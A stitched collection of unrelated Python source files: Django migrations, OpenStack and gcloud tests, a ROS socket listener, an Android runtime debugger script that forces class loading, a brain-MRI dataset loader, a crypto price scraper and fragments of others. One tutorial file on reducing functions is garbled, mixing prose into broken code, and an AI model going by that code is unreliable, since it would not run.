with pytest.raises(IntegrityError):
actor.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
|
py | 1a3f76e9b233c61012ace9933073b81a881836c7 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-27 13:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('acp_calendar', '0002_load_holiday_type'),
]
operations = [
migrations.AddField(
model_name='acpholiday',
name='fiscal_year',
field=models.IntegerField(default=0, verbose_name='fiscal year'),
),
]
|
py | 1a3f76edc4f66b98ae0b6c9ecd90a1a1f2306947 | """Reducing Functions in Python
These are functions that recombine an iterable recursively, ending up with a single return value
Also called accumulators, aggregators, or folding functions
Example: Finding the maximum value in an iterable
a0, a1, a2, ...,, aN-1
max(a, b) _> maximum of a and b
result =a0
result = max(result, a1)
result = max(result, a2)
...
result = max(result, an-1)
# max value in a0, a1, a2, ..., an-1
the special case of sequences
(i.e. we can use indexes to access elements in the sequence)
Using a loop
"""
l = l[5, 8, 6, 10, 9] # result = 5
max_value = lambda a, b: a if a > b else b # result = max(5, 8) = 8
def max_sequence(sequence): # result = max(5, 6) = 8
result = sequence[0]
for e in sequence[1:]: # result = max(5, 10) = 10
result = max_value(result, e) # result = max(5, 10) = 10
return result # result -> 10
Notice the sequence of steps:
l = [5, 8, 6, 10, 9]
^ | |
| | |
5 | |
\ | |
max(5, 8) |
8
\
\
max(8, 6) |
py | 1a3f77014d6512537fcb6347d3b30ebbac1bbfbd | from django.db import models
from django.utils.text import gettext_lazy as _
from django.urls import reverse
class BaseModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
|
py | 1a3f771c0ea151e6138fef721a2dd113170c544e | #!/usr/bin/env python
import socket
import sys
import rospy
from geometry_msgs.msg import Pose2D
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('10.103.118.91', 8000)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
pub = rospy.Publisher('/nav_goal', Pose2D, queue_size=10)
rospy.init_node('goal_publisher', anonymous=True)
rate = rospy.Rate(100) # 10hz
"""
starting up on 10.103.118.91 port 8000
waiting for a connection
connection from ('10.103.95.125', 43562)
received "{ "skill_name" : "Go_to","location": "water"}"
sending data back to the client
received ""
no more data from ('10.103.95.125', 43562)
waiting for a connection
"""
named_locations = {"door" : [-1, -1, 0], "water": [-2, -7, 0], "middle": [-1.5, -3, 0]}
def get_position_from_name(name):
try:
return named_locations[name.strip().lower()]
except:
return None
while True:
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
try:
print >>sys.stderr, 'connection from', client_address
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(4000)
if data:
name = data.split('"location": ')[1].replace("}", "").replace('"', '').strip()
print(name)
pos = get_position_from_name(name)
if pos is not None:
for _ in range(10):
pub.publish(*pos)
else:
print >>sys.stderr, 'no more data from', client_address
break
finally:
# Clean up the connection
connection.close() |
py | 1a3f775fcf3d94441ee73b8d80b556eae0ea6dd6 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from tempest.api.object_storage import base
from tempest.common.utils.data_utils import rand_name
from tempest import exceptions
from tempest.test import attr
from tempest.test import HTTP_SUCCESS
class AccountTest(base.BaseObjectTest):
@classmethod
def setUpClass(cls):
super(AccountTest, cls).setUpClass()
cls.containers = []
for i in xrange(ord('a'), ord('f') + 1):
name = rand_name(name='%s-' % chr(i))
cls.container_client.create_container(name)
cls.containers.append(name)
cls.containers_count = len(cls.containers)
@classmethod
def tearDownClass(cls):
cls.delete_containers(cls.containers)
super(AccountTest, cls).tearDownClass()
@attr(type='smoke')
def test_list_containers(self):
# list of all containers should not be empty
params = {'format': 'json'}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertIsNotNone(container_list)
container_names = [c['name'] for c in container_list]
for container_name in self.containers:
self.assertIn(container_name, container_names)
@attr(type='smoke')
def test_list_containers_with_limit(self):
# list containers one of them, half of them then all of them
for limit in (1, self.containers_count / 2, self.containers_count):
params = {'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_containers_with_marker(self):
# list containers using marker param
# first expect to get 0 container as we specified last
# the container as marker
# second expect to get the bottom half of the containers
params = {'marker': self.containers[-1]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2 - 1)
@attr(type='smoke')
def test_list_containers_with_end_marker(self):
# list containers using end_marker param
# first expect to get 0 container as we specified first container as
# end_marker
# second expect to get the top half of the containers
params = {'end_marker': self.containers[0]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'end_marker': self.containers[self.containers_count / 2]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), self.containers_count / 2)
@attr(type='smoke')
def test_list_containers_with_limit_and_marker(self):
# list containers combining marker and limit param
# result are always limitated by the limit whatever the marker
for marker in random.choice(self.containers):
limit = random.randint(0, self.containers_count - 1)
params = {'marker': marker,
'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertLessEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_account_metadata(self):
# list all account metadata
resp, metadata = self.account_client.list_account_metadata()
self.assertIn(int(resp['status']), HTTP_SUCCESS)
self.assertIn('x-account-object-count', resp)
self.assertIn('x-account-container-count', resp)
self.assertIn('x-account-bytes-used', resp)
@attr(type='smoke')
def test_create_and_delete_account_metadata(self):
header = 'test-account-meta'
data = 'Meta!'
# add metadata to account
resp, _ = self.account_client.create_account_metadata(
metadata={header: data})
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertIn('x-account-meta-' + header, resp)
self.assertEqual(resp['x-account-meta-' + header], data)
# delete metadata from account
resp, _ = \
self.account_client.delete_account_metadata(metadata=[header])
self.assertIn(int(resp['status']), HTTP_SUCCESS)
resp, _ = self.account_client.list_account_metadata()
self.assertNotIn('x-account-meta-' + header, resp)
@attr(type=['negative', 'gate'])
def test_list_containers_with_non_authorized_user(self):
# list containers using non-authorized user
# create user
self.data.setup_test_user()
resp, body = \
self.token_client.auth(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
new_token = \
self.token_client.get_token(self.data.test_user,
self.data.test_password,
self.data.test_tenant)
custom_headers = {'X-Auth-Token': new_token}
params = {'format': 'json'}
# list containers with non-authorized user token
self.assertRaises(exceptions.Unauthorized,
self.custom_account_client.list_account_containers,
params=params, metadata=custom_headers)
# delete the user which was created
self.data.teardown_all()
|
py | 1a3f777399f5f9e1c756b1f294a7641eb0d0a184 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class TestConnection(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.dns.connection import Connection
return Connection
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_build_api_url_no_extra_query_params(self):
conn = self._makeOne()
URI = '/'.join([
conn.API_BASE_URL,
'dns',
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._makeOne()
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', 'dns', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
|
py | 1a3f78dbf1d8e0ee74ecd5c694f9651951f2ed27 | # LoadClass_arm.py is used to .... when the "ClassLinker::LoadClassMembers" method is invoked in 32-bit mode.
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
from DexParser import header_item, string_id_item, type_id_item, class_def_item
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
def retrieve_string_value(string_ptr):
length_val = memory.readMemory32(string_ptr + config.offset_string_length)
reference_ptr = memory.readMemory32(string_ptr + config.offset_string_reference)
char_array = memory.retrieve_char_array(reference_ptr)
return char_array
def start_prolog():
# disable the FindClass breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
brk_object.disable()
def end_prolog_done():
# disable the FindClass breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
brk_object.disable()
# disable the LoadMethod breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
brk_object.disable()
def end_prolog():
# enable the FindClass breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
brk_object.enable()
def cleanup():
if mmu.page_table is not None:
del mmu.page_table
gc.collect()
def FindClass():
# -- HEAD -- #
start_prolog()
# ensure that the LoadMethod breakpoint is enabled
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
brk_object.enable()
# -- BODY -- #
# get the "descriptor" parameter
descriptor_param = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
descriptor_ptr = descriptor_param
# read the "descriptor" string
descriptor_string_val = memory.retrieve_char_array(descriptor_ptr)
print "[FindClass] descriptor = %s" % descriptor_string_val
if config.package_name.replace(".", "/") in descriptor_string_val:
force_loading(descriptor_string_val)
# -- TAIL -- #
end_prolog_done()
else:
# -- TAIL -- #
end_prolog()
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
def force_loading(exclude_class):
# save register values
origin_R0_val = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
origin_R1_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
origin_R2_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
origin_R3_val = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff
origin_R12_val = int(execution_state.getRegisterService().getValue("R12")) & 0xffffffff
origin_SP_val = int(execution_state.getRegisterService().getValue("SP")) & 0xffffffff
origin_LR_val = int(execution_state.getRegisterService().getValue("LR")) & 0xffffffff
origin_CPSR_val = int(execution_state.getRegisterService().getValue("CPSR")) & 0xffffffff
page_size = 0x1000
page_vtl_start_address = origin_SP_val - (origin_SP_val % page_size)
print "[FindClass] origin SP = %0#10x" % origin_SP_val
print "[FindClass] origin page = %0#10x" % page_vtl_start_address
origin_content = execution_state.getMemoryService().read(page_vtl_start_address, page_size)
print origin_content
# retrieve dex_file_ptr and dex_file_size
fp = open(os.path.join(config.workspace, config.log_file), "r")
for range_info in fp.readlines():
range_info = range_info.replace("\n", "").strip()
if "[DexFile]" in range_info:
range_info = range_info.split(",")[0].split("=")[1].strip()
break
fp.close()
dex_file_begin_val = int(range_info.split(", ")[0], 16) & 0xffffffff
# retrieve loaded classes
loaded_classes = []
loaded_classes.append(exclude_class)
fp = open(os.path.join(config.workspace, config.log_file), "r")
for class_info in fp.readlines():
class_info = class_info.replace("\n", "").strip()
if "[LoadMethod] origin" in class_info:
class_info = class_info.split(";")[0].split(" ")[-1].strip()
class_info = class_info + ";"
print "[FindClass] loaded class = %s" % class_info
if not (class_info in loaded_classes):
loaded_classes.append(class_info)
fp.close()
# resolve
string_ids_off = header_item.get_string_ids_off(dex_file_begin_val)
type_ids_off = header_item.get_type_ids_off(dex_file_begin_val)
class_defs_size = header_item.get_class_defs_size(dex_file_begin_val)
class_defs_off = header_item.get_class_defs_off(dex_file_begin_val)
for class_def_idx in range(class_defs_size):
class_idx = class_def_item.get_class_idx(dex_file_begin_val, class_defs_off, class_def_idx)
class_descriptor_idx = type_id_item.get_descriptor_idx(dex_file_begin_val, type_ids_off, class_idx)
class_descriptor_content = string_id_item.get_string_id_item_data(dex_file_begin_val, string_ids_off, class_descriptor_idx)
if class_descriptor_content in loaded_classes:
continue
print "[FindClass] force descriptor = %s" % class_descriptor_content
# hook
execution_state.getRegisterService().setValue("R0", origin_R0_val)
execution_state.getRegisterService().setValue("R1", origin_R1_val)
descriptor_ptr = string_id_item.get_string_id_item_data_off(dex_file_begin_val, string_ids_off, class_descriptor_idx)
print "[FindClass] force descriptor address = %0#10x" % descriptor_ptr
execution_state.getRegisterService().setValue("R2", descriptor_ptr)
descriptor_content = string_id_item.get_string_id_item_data(dex_file_begin_val, string_ids_off, class_descriptor_idx)
print "[FindClass] force descriptor value = %s" % descriptor_content
hash = ComputeModifiedUtf8Hash(descriptor_content) & 0xffffffff
execution_state.getRegisterService().setValue("R3", hash)
execution_state.getRegisterService().setValue("R12", origin_R12_val)
execution_state.getRegisterService().setValue("SP", origin_SP_val)
execution_state.getRegisterService().setValue("LR", origin_LR_val)
execution_state.getRegisterService().setValue("CPSR", origin_CPSR_val)
execution_state.getMemoryService().write(page_vtl_start_address, origin_content)
# execute
execution_state.getExecutionService().resumeTo(config.brk_FindClass_end)
try:
execution_state.getExecutionService().waitForStop(10 * 60 * 1000) # wait for 10mins
except DebugException:
raise RuntimeError("wtf !!!")
execution_state.getRegisterService().setValue("PC", config.brk_FindClass)
# recover register values
execution_state.getRegisterService().setValue("R0", origin_R0_val)
execution_state.getRegisterService().setValue("R1", origin_R1_val)
execution_state.getRegisterService().setValue("R2", origin_R2_val)
execution_state.getRegisterService().setValue("R3", origin_R3_val)
execution_state.getRegisterService().setValue("R12", origin_R12_val)
execution_state.getRegisterService().setValue("SP", origin_SP_val)
execution_state.getRegisterService().setValue("LR", origin_LR_val)
execution_state.getRegisterService().setValue("CPSR", origin_CPSR_val)
post_content = execution_state.getMemoryService().read(page_vtl_start_address, page_size)
print post_content
execution_state.getMemoryService().write(page_vtl_start_address, origin_content)
# execute
execution_state.getExecutionService().resumeTo(config.brk_FindClass_end)
try:
execution_state.getExecutionService().waitForStop(10 * 60 * 1000) # wait for 10mins
except DebugException:
raise RuntimeError("wtf !!!")
def ComputeModifiedUtf8Hash(input):
hash = 0
input_bytes = bytes(input)
for idx in range(len(input_bytes)):
hash = hash * 31 + ord(input_bytes[idx])
return hash
if __name__ == '__main__':
FindClass()
sys.exit()
|
py | 1a3f78fbe04dc9ac80fb262eec7682bf8bc404a8 | import os
import torch
import numpy as np
import SimpleITK as sitk
import random
from torch.utils.data import Dataset
class BraTS(Dataset):
def __init__(self, root, phase, desired_depth=128, desired_height=160, desired_width=192, normalize_flag=True,
scale_intensity_flag=False, shift_intesity_flag=False, flip_axes_flag=False):
self.root = root
self.patients = os.listdir(self.root)
self.patients = [x for x in self.patients if x.startswith('BraTS')]
self.flair_suffix = "_flair.nii.gz"
self.t1_suffix = "_t1.nii.gz"
self.t1ce_suffix = "_t1ce.nii.gz"
self.t2_suffix = "_t2.nii.gz"
self.seg_suffix = "_seg.nii.gz"
self.wt_suffix = "_contour_wt.nii.gz"
self.tc_suffix = "_contour_tc.nii.gz"
self.et_suffix = "_contour_et.nii.gz"
self.phase = phase
self.desired_depth = desired_depth
self.desired_height = desired_height
self.desired_width = desired_width
self.normalize_flag = normalize_flag
self.scale_intensity_flag = scale_intensity_flag
self.shift_intensity_flag = shift_intesity_flag
self.flip_axes_flag = flip_axes_flag
def __len__(self):
return len(self.patients)
def __getitem__(self, idx):
patient = self.patients[idx]
path_flair = os.path.join(self.root, patient, patient + self.flair_suffix)
path_t1 = os.path.join(self.root, patient, patient + self.t1_suffix)
path_t2 = os.path.join(self.root, patient, patient + self.t2_suffix)
path_t1ce = os.path.join(self.root, patient, patient + self.t1ce_suffix)
path_seg = os.path.join(self.root, patient, patient + self.seg_suffix)
path_contour_wt = os.path.join(self.root, patient, patient + self.wt_suffix)
path_contour_tc = os.path.join(self.root, patient, patient + self.tc_suffix)
path_contour_et = os.path.join(self.root, patient, patient + self.et_suffix)
mask, start_depth, start_height, start_width = self.get_mask_simple(path_seg)
out = self.get_volume(path_flair, path_t1, path_t2, path_t1ce, start_depth,
start_height, start_width)
contours = self.get_contours(path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width)
if self.flip_axes_flag:
dice = random.uniform(0, 1)
if dice > 0.5 and dice < 0.6:
mask = mask[:, ::-1, : , :].copy()
out = out[:, ::-1, : , :].copy()
contours = contours[:, ::-1, : , :].copy()
elif dice > 0.6 and dice < 0.7:
mask = mask[:, :, ::-1 , :].copy()
out = out[:, :, ::-1 , :].copy()
contours = contours[:, :, ::-1 , :].copy()
elif dice > 0.7 and dice < 0.8:
mask = mask[:, :, : , ::-1].copy()
out = out[:, :, : , ::-1].copy()
contours = contours[:, :, : , ::-1].copy()
elif dice > 0.8 and dice < 0.9:
mask = mask[:, :, ::-1 , ::-1].copy()
out = out[:, :, ::-1 , ::-1].copy()
contours = contours[:, :, ::-1 , ::-1].copy()
elif dice > 0.9 and dice < 1:
mask = mask[:, ::-1, ::-1 , ::-1].copy()
out = out[:, ::-1, ::-1 , ::-1].copy()
contours = contours[:, ::-1, ::-1 , ::-1].copy()
return torch.FloatTensor(out), torch.FloatTensor(mask), torch.FloatTensor(contours), patient
def get_contours(self, path_contour_wt, path_contour_tc, path_contour_et, start_depth, start_height, start_width):
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
try:
contour_wt = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_wt))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
try:
contour_tc = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_tc))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
try:
contour_et = sitk.GetArrayFromImage(sitk.ReadImage(path_contour_et))[start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
except Exception as e:
return np.zeros((self.desired_depth, self.desired_height, self.desired_width))
return np.stack((contour_wt, contour_tc, contour_et))
def normalize_one_volume(self, volume):
new_volume = np.zeros(volume.shape)
location = np.where(volume != 0)
mean = np.mean(volume[location])
var = np.std(volume[location])
new_volume[location] = (volume[location] - mean) / var
return new_volume
def merge_volumes(self, *volumes):
return np.stack(volumes, axis=0)
def shift_intensity(self, volume):
location = np.where(volume != 0)
minimum = np.min(volume[location])
maximum = np.max(volume[location])
std = np.std(volume[location])
value = np.random.uniform(low=-0.1 * std, high=0.1 * std, size=1)
volume[location] += value
volume[location][volume[location] < minimum] = minimum
volume[location][volume[location] > maximum] = maximum
return volume
def scale_intensity(self, volume):
location = np.where(volume != 0)
new_volume = np.zeros(volume.shape)
IntensityScale = np.random.uniform(0.9, 1, 1)
new_volume[location] = volume[location] * IntensityScale
return new_volume
def crop_volume(self, volume, start_depth, start_height, start_width):
### initial volumes are 155 X 240 X 240
depth = self.desired_depth
height = self.desired_height
width = self.desired_width
return volume[:, start_depth: start_depth + depth, start_height: start_height + height, start_width: start_width + width]
def get_volume(self, path_flair, path_t1, path_t2, path_t1ce, start_depth, start_height, start_width):
flair = sitk.GetArrayFromImage(sitk.ReadImage(path_flair))
t1 = sitk.GetArrayFromImage(sitk.ReadImage(path_t1))
t2 = sitk.GetArrayFromImage(sitk.ReadImage(path_t2))
t1ce = sitk.GetArrayFromImage(sitk.ReadImage(path_t1ce))
if self.desired_depth > 155:
flair = np.concatenate([flair, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1 = np.concatenate([t1, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t2 = np.concatenate([t2, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
t1ce = np.concatenate([t1ce, np.zeros((self.desired_depth - 155, 240, 240))], axis=0)
if self.scale_intensity_flag:
flair = self.scale_intensity(flair)
t1 = self.scale_intensity(t1)
t2 = self.scale_intensity(t2)
t1ce = self.scale_intensity(t1ce)
if self.shift_intensity_flag:
flair = self.shift_intensity(flair)
t1 = self.shift_intensity(t1)
t2 = self.shift_intensity(t2)
t1ce = self.shift_intensity(t1ce)
if self.normalize_flag == True:
out = self.merge_volumes(self.normalize_one_volume(flair), self.normalize_one_volume(t2), self.normalize_one_volume(t1ce),
self.normalize_one_volume(t1))
else:
out = self.merge_volumes(flair, t2, t1ce, t1)
out = self.crop_volume(out, start_depth, start_height, start_width)
return out
def get_mask_simple(self, path_seg):
try:
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
except Exception as e:
seg = np.zeros((155, 240, 240))
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
if desired_depth <= 155:
start_depth = np.random.randint(0, 156 - desired_depth)
to_add = 0
else:
start_depth = 0
to_add = desired_depth - 155
desired_depth = 155
start_height = np.random.randint(0, 241 - desired_height)
start_width = np.random.randint(0, 241 - desired_width)
end_depth = start_depth + desired_depth
end_height = start_height + desired_height
end_width = start_width + desired_width
if to_add != 0:
pad_seg = np.zeros((to_add, end_height - start_height, end_width - start_width))
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
if to_add != 0:
new_seg = np.concatenate([new_seg, pad_seg], axis=0)
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width
def get_mask(self, path_seg):
seg = sitk.GetArrayFromImage(sitk.ReadImage(path_seg))
location = np.where(seg != 0)
min_depth, max_depth = np.min(location[0]), np.max(location[0])
min_height, max_height = np.min(location[1]), np.max(location[1])
min_width, max_width = np.min(location[2]), np.max(location[2])
desired_depth = self.desired_depth
desired_height = self.desired_height
desired_width = self.desired_width
new_volume = np.zeros((desired_depth, desired_height, desired_width))
difference_depth = max_depth - min_depth
difference_height = max_height - min_height
difference_width = max_width - min_width
if difference_depth < desired_depth:
start_depth = np.random.randint(min_depth // 2, min_depth)
end_depth = min(start_depth + desired_depth, 155)
if end_depth == 155:
start_depth = end_depth - desired_depth
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_depth = min_depth
end_depth = start_depth + desired_depth
else:
end_depth = max_depth
start_depth = max_depth - desired_depth
if difference_height < desired_height:
start_height = np.random.randint(min_height // 2, min_height)
end_height = min(start_height + desired_height, 240)
if end_height == 240:
start_height = end_height - desired_height
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_height = min_height
end_height = start_height + desired_height
else:
end_height = max_height
start_height = max_height - desired_height
if difference_width < desired_width:
start_width = np.random.randint(min_width // 2, min_width)
end_width = min(start_width + desired_width, 240)
if end_width == 240:
start_width = end_width - desired_width
else:
dice = np.random.uniform(0, 1)
if dice > 0.5:
start_width = min_width
end_width = start_width + desired_width
else:
end_width = max_width
start_width = max_width - desired_width
new_seg = seg[start_depth: end_depth, start_height: end_height, start_width: end_width]
final_seg = np.zeros((3, ) + new_seg.shape)
final_seg[0, :, :, :][np.where(new_seg != 0)] = 1
final_seg[1, :, :, :][np.where((new_seg == 4) | (new_seg == 1))] = 1
final_seg[2, :, :, :][np.where(new_seg == 4)] = 1
return final_seg, start_depth, start_height, start_width |
py | 1a3f7a4adc3018d806a5388a4157f44203c2cbd5 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.11 on 2016-12-01 05:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("resolwe_bio", "0008_migrate_sample"),
]
operations = [
migrations.AlterUniqueTogether(name="sample", unique_together=set([]),),
migrations.RemoveField(model_name="sample", name="collections",),
migrations.RemoveField(model_name="sample", name="contributor",),
migrations.RemoveField(model_name="sample", name="data",),
migrations.RemoveField(model_name="sample", name="descriptor_schema",),
migrations.RemoveField(model_name="sample", name="public_processes",),
migrations.DeleteModel(name="Sample",),
]
|
py | 1a3f7ab88ee79216331b9a17dfe7703cf41e8da8 | from . import generators as gen
from datetime import date
import pytest
import settler as s
# -- example-based tests --
@pytest.mark.parametrize('trade_date,tenor,expected', [
(date(2021, 11, 1), 'TOM', date(2021, 11, 2))])
def test_tenors_before_spot(trade_date, tenor, expected):
vd = s.ValueDateCalculator()
assert vd.value_date_for('USDSGD', tenor, trade_date) == expected
@pytest.mark.parametrize('trade_date,tenor,expected', [
(date(2021, 11, 1), '1W', date(2021, 11, 10)),
(date(2021, 11, 1), '1M', date(2021, 12, 3))])
def test_tenors_beyond_spot_starts_from_spot(trade_date, tenor, expected):
vd = s.ValueDateCalculator()
assert vd.value_date_for('USDSGD', tenor, trade_date) == expected
|
py | 1a3f7aff08e3b61e58932921c7b335068d030eef |
from enum import Enum, unique
import json
import re
import requests
from bs4 import BeautifulSoup
BASE_URL = "https://min-api.cryptocompare.com/data/generateAvg?fsym=%s&tsym=%s&markets=%s"
KOIMIM_URL = "https://koinim.com/ticker/"
@unique
class Markets(Enum):
Paribu = 'Paribu'
Koinim = 'Koinim'
Cexio = 'Cexio'
Bitstamp = 'Bitstamp'
Bitfinex = 'Bitfinex'
Poloniex = 'Poloniex'
BTCE = 'BTCE'
OKCoin = 'OKCoin'
Coinbase = 'Coinbase'
Kraken = 'Kraken'
class Ticker:
'''Ticker api for some popular markets.'''
def __init__(self):
self._market = None
self._couple = None
@property
def pair(self):
return self._couple
@pair.setter
def pair(self, value):
self._couple = value
return self._couple
@property
def market(self):
return self._market
@market.setter
def market(self, value):
self._market = value
return self._market
def ticker(self):
couple = self._couple.split('/')
request_url = BASE_URL % (couple[0], couple[1], self._market.value)
result = self.__api_call(request_url)
try:
if self.market == Markets.Koinim and self.pair == 'BTC/TRY':
result = {
'price': "₺ {:,.2f}".format(result['last_order']),
'volume24h': "Ƀ {:,.2f}".format(result['volume']),
'open24h': 'NaN',
'high24h': "₺ {:,.2f}".format(result['high']),
'low24h': "₺ {:,.2f}".format(result['low']),
'change24h': "% {:.2f}".format(result['change_rate'])
}
return result
elif self.market == Markets.Paribu and self.pair == 'BTC/TRY':
return self.paribu_ticker()
result = {
'price': result['DISPLAY']['PRICE'],
'volume24h': result['DISPLAY']['VOLUME24HOUR'],
'open24h': result['DISPLAY']['OPEN24HOUR'],
'high24h': result['DISPLAY']['HIGH24HOUR'],
'low24h': result['DISPLAY']['LOW24HOUR'],
'change24h': result['DISPLAY']['CHANGE24HOUR']
}
except KeyError:
return None
return result
def paribu_ticker(self):
html_doc = requests.get('https://www.paribu.com').text
soup = BeautifulSoup(html_doc, 'html.parser')
js_text = soup.find('script', type="text/javascript").text
regex = re.compile('("day_stats"):(.*?)$|,', re.MULTILINE)
js_text = re.findall(regex, js_text)[7][1]
result = json.loads(re.sub("}}};", "", js_text))
result = {
'price': "₺ {:,.2f}".format(result['lst']),
'volume24h': "NaN",
'open24h': 'NaN',
'high24h': "₺ {:,.2f}".format(result['max']),
'low24h': "₺ {:,.2f}".format(result['min']),
'change24h': "₺ {:.2f}".format(result['chg'])
}
return result
def __api_call(self, uri):
if self.market == Markets.Koinim:
result = requests.get(KOIMIM_URL).json()
return result
result = requests.get(uri).json()
return result
|
py | 1a3f7b3198f26dd443f6f7ee830dfc1a478a2965 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test AerPauliExpectation """
import itertools
import unittest
from test.python.opflow import QiskitOpflowTestCase
import numpy as np
from qiskit.circuit.library import RealAmplitudes
from qiskit.opflow import (
CX,
AerPauliExpectation,
CircuitSampler,
CircuitStateFn,
H,
I,
ListOp,
Minus,
One,
PauliExpectation,
PauliSumOp,
Plus,
S,
StateFn,
X,
Y,
Z,
Zero,
)
from qiskit.utils import QuantumInstance
class TestAerPauliExpectation(QiskitOpflowTestCase):
